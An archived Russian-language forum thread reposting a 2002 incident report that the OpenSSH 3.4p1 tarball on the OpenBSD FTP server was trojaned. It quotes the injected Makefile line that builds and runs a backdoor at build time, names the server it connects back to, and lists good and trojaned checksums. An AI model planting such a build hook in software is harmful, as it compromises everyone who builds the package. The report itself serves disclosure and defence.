The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"На openssh лежит дистрибутив openssh-3.4p1.tar.gz trojaned"
Вариант для распечатки Архивированная нить - только для чтения! 
Пред. тема | След. тема 
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение [Проследить за развитием треда]

"На openssh лежит дистрибутив openssh-3.4p1.tar.gz trojaned"
Сообщение от lavr emailИскать по авторуВ закладки on 01-Авг-02, 17:54  (MSK)
Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@mavetju.org>
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

    ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).
  
[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

  Рекомендовать в FAQ | Cообщить модератору | Наверх

 Оглавление

Индекс форумов | Темы | Пред. тема | След. тема
Сообщения по теме

1. "RE: На openssh лежит дистрибутив openssh-3.4p1.tar.gz trojan..."
Сообщение от lavr emailИскать по авторуВ закладки on 01-Авг-02, 18:02  (MSK)
ну и конечно даже ежику ясно что скорее всего openbsd.org сломали. :(
  Рекомендовать в FAQ | Cообщить модератору | Наверх

2. "RE: На openssh лежит дистрибутив openssh-3.4p1.tar.gz trojan..."
Сообщение от dawnshade emailИскать по авторуВ закладки on 01-Авг-02, 18:11  (MSK)
>ну и конечно даже ежику ясно что скорее всего openbsd.org сломали. :(
>
Ага, а ты зайди на тот ирк и спроси :))

  Рекомендовать в FAQ | Cообщить модератору | Наверх


Удалить

Индекс форумов | Темы | Пред. тема | След. тема
Пожалуйста, прежде чем написать сообщение, ознакомьтесь с данными рекомендациями.




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру